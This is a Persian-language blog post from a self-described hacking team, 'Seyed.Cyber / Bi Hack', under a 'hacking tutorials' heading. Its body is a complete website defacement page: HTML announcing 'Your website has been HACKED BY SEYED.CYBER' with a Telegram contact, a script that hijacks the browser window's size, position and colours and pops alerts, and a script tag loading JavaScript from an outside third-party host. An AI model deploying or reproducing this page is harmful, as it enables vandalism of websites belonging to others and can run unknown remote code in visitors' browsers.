Seyed.Cyber

وب سایت رسمی تیم سایبری بی هک تقدیم میکند

Seyed.Cyber

وب سایت رسمی تیم سایبری بی هک تقدیم میکند

Seyed.Cyber

♦️ سـکـوت شـیـر هـا نـشـانـه تـرس از شـغـال هـا نـیـسـت ♦️

اموزش های هکینگ
نظرات
  • ۱۳ آذر ۰۰، ۱۴:۱۷ - ziba
    yyttutuu


<html>
<script type="text/javascript">
var _gaq = _gaq || [];
_gaq.push(['_setAccount', 'UA-48685264-1']);
_gaq.push(['_setDomainName', 'blogfa.com']);
_gaq.push(['_trackPageview']);
(function() {
var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;
ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js';
var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);
})();

</script>
<html>
<head>
<link href="http://i.hizliresim.com/wj2RLg.gif" rel="shortcut icon">
<meta content="text/html; charset=utf-8" http-equiv="Content-Type" />
<title>Hacked By sezar hack</title>
<style type="text/css">
*,html,body,div,p,h2{padding: 0px;margin: 0px;}body{background-color: #000000;}#container{margin: 0 auto;width: 980px;padding-top: 40px;}#content-container{float: left;width: 980px;}#content{clear: left;float: left;width: 581px;padding: 20px 0 20px 0;margin: 0 0 0 30px;display: inline;color: #22ff00;}#content h2 {font-family: Cambria;font-size: 170px;}#aside{float: right;width: 340px;padding: 0px;display: inline;background-image: url('http://i.hizliresim.com/8EDvRn.png');height: 300px;}.hacker{float: right;font-family: Cambria;font-size: 30px;font-weight: bold;}.notes{padding-top: 90px;line-height: 1.3em;font-weight: bold;font-size: 16px;font-family: "Courier New";}.contact{padding-top: 30px;font-size: 18px;font-family: "Courier New", Courier, monospace;font-weight: bold;color: #00ffec;}#music{padding: 80px 80px 0px 0px;float: right;clear: right;}</style>
</head>
<script type="text/javascript">
TypingText = function(element, interval, cursor, finishedCallback) {
  if((typeof document.getElementById == "undefined") || (typeof element.innerHTML == "undefined")) {
    this.running = true;
    return;
  }
  this.element = element;
  this.finishedCallback = (finishedCallback ? finishedCallback : function() { return; });
  this.interval = (typeof interval == "undefined" ? 100 : interval);
  this.origText = this.element.innerHTML;
  this.unparsedOrigText = this.origText;
  this.cursor = (cursor ? cursor : "");
  this.currentText = "";
  this.currentChar = 0;
  this.element.typingText = this;
  if(this.element.id == "") this.element.id = "typingtext" + TypingText.currentIndex++;
  TypingText.all.push(this);
  this.running = false;
  this.inTag = false;
  this.tagBuffer = "";
  this.inHTMLEntity = false;
  this.HTMLEntityBuffer = "";
}
TypingText.all = new Array();
TypingText.currentIndex = 0;
TypingText.runAll = function() {
  for(var i = 0; i < TypingText.all.length; i++) TypingText.all[i].run();
}
TypingText.prototype.run = function() {
  if(this.running) return;
  if(typeof this.origText == "undefined") {
    setTimeout("document.getElementById('" + this.element.id + "').typingText.run()", this.interval);
    return;
  }
  if(this.currentText == "") this.element.innerHTML = "";
  if(this.currentChar < this.origText.length) {
    if(this.origText.charAt(this.currentChar) == "<" && !this.inTag) {
      this.tagBuffer = "<";
      this.inTag = true;
      this.currentChar++;
      this.run();
      return;
    } else if(this.origText.charAt(this.currentChar) == ">" && this.inTag) {
      this.tagBuffer += ">";
      this.inTag = false;
      this.currentText += this.tagBuffer;
      this.currentChar++;
      this.run();
      return;
    } else if(this.inTag) {
      this.tagBuffer += this.origText.charAt(this.currentChar);
      this.currentChar++;
      this.run();
      return;
    } else if(this.origText.charAt(this.currentChar) == "&" && !this.inHTMLEntity) {
      this.HTMLEntityBuffer = "&";
      this.inHTMLEntity = true;
      this.currentChar++;
      this.run();
      return;
    } else if(this.origText.charAt(this.currentChar) == ";" && this.inHTMLEntity) {
      this.HTMLEntityBuffer += ";";
      this.inHTMLEntity = false;
      this.currentText += this.HTMLEntityBuffer;
      this.currentChar++;
      this.run();
      return;
    } else if(this.inHTMLEntity) {
      this.HTMLEntityBuffer += this.origText.charAt(this.currentChar);
      this.currentChar++;
      this.run();
      return;
    } else {
      this.currentText += this.origText.charAt(this.currentChar);
    }
    this.element.innerHTML = this.currentText;
    this.element.innerHTML += (this.currentChar < this.origText.length - 1 ? (typeof this.cursor == "function" ? this.cursor(this.currentText) : this.cursor) : "");
    this.currentChar++;
    setTimeout("document.getElementById('" + this.element.id + "').typingText.run()", this.interval);
  } else {
	this.currentText = "";
	this.currentChar = 0;
        this.running = false;
        this.finishedCallback();
  }
}
</script> 
<script>
window.scrollBy(0, 1) 
window.resizeTo(0,0) 
window.moveTo(0,0) 
setTimeout("move()", 1); 
var mxm=50 
var mym=25 
var mx=0 
var my=0 
var sv=50 
var status=1 
var szx=0 
var szy=0 
var c=255 
var n=0 
var sm=30 
var cycle=2 
var done=2 
function move() 
{ 
if (status == 1) 
{ 
mxm=mxm/1.05 
mym=mym/1.05 
mx=mx+mxm 
my=my-mym 
mxm=mxm+(400-mx)/100 
mym=mym-(300-my)/100 
window.moveTo(mx,my) 
rmxm=Math.round(mxm/10) 
rmym=Math.round(mym/10) 
if (rmxm == 0) 
{ 
if (rmym == 0) 
{ 
status=2 
} 
} 
} 
if (status == 2) 
{ 
sv=sv/1.1 
scrratio=1+1/3 
mx=mx-sv*scrratio/2 
my=my-sv/2 
szx=szx+sv*scrratio 
szy=szy+sv 
window.moveTo(mx,my) 
window.resizeTo(szx,szy) 
if (sv < 0.1) 
{ 
status=3 
} 
} 
if (status == 3) 
{ 
document.fgColor=0xffffFF 
c=c-16 
if (c<0) 
{status=8} 
} 
if (status == 4) 
{ 
c=c+16 
document.bgColor=c*65536 
document.fgColor=(255-c)*65536 
if (c > 239) 
{status=5} 
} 
if (status == 5) 
{ 
c=c-16 
document.bgColor=c*65536 
document.fgColor=(255-c)*65536 
if (c < 0) 
{ 
status=6 
cycle=cycle-1 
if (cycle > 0) 
{ 
if (done == 1) 
{status=7} 
else 
{status=4} 
} 
} 
} 
if (status == 6) 
{ 
document.title = "Cljck" 
alert("Cljck") 
cycle=2 
status=4 
done=1 
} 
if (status == 7) 
{ 
c=c+4 
document.bgColor=c*65536 
document.fgColor=(255-c)*65536 
if (c > 128) 
{status=8} 
} 
if (status == 8) 
{ 
window.moveTo(0,0) 
sx=screen.availWidth 
sy=screen.availHeight 
window.resizeTo(sx,sy) 
status=9 
} 
var timer=setTimeout("move()",0.3) 
} 
</script>
<body>
<div id="container">
	<div id="content-container">
		<div id="content">
<h2><font color="maroon">HACKED</font></h2>
<p class="hacker">BY SEYED.CYBER</p>
<p id="message" class="notes">		
Your website has been HACKED BY SEYED.CYBER
<br><br>id : @SEYED_CYBER<br>T.ME/BI_HACKE<br>   <br><br>TAGHDIM BE BIHACK<br><br> # ... # FINISH # ... # <br />
web : BIHACK.BLOG.IR<br />
    <br />
    <font color="maroon">World FamouS! BI HACK WaS HeRe. </font><br />
    <font color="maroon"> </font><br />
<font color="maroon">BI HACK</font></p>
<p class="notes"> </p>
<script type="text/javascript">
new TypingText(document.getElementById("message"), 90, function(i){ var ar = new Array("_", " ", "_", " "); return " " + ar[i.length % ar.length]; });
TypingText.runAll();
</script>
</div>
<div id="aside" >
		</div>
	</div>
    <p> </p>
</div>
<SCRIPT SRC=http://www.otoelektronik.net/yazciz/ciz.js></SCRIPT>
</body>
</html>
 


نظرات  (۰)

هیچ نظری هنوز ثبت نشده است
ارسال نظر آزاد است، اما اگر قبلا در بیان ثبت نام کرده اید می توانید ابتدا وارد شوید.
شما میتوانید از این تگهای html استفاده کنید:
<b> یا <strong>، <em> یا <i>، <u>، <strike> یا <s>، <sup>، <sub>، <blockquote>، <code>، <pre>، <hr>، <br>، <p>، <a href="" title="">، <span style="">، <div align="">
تجدید کد امنیتی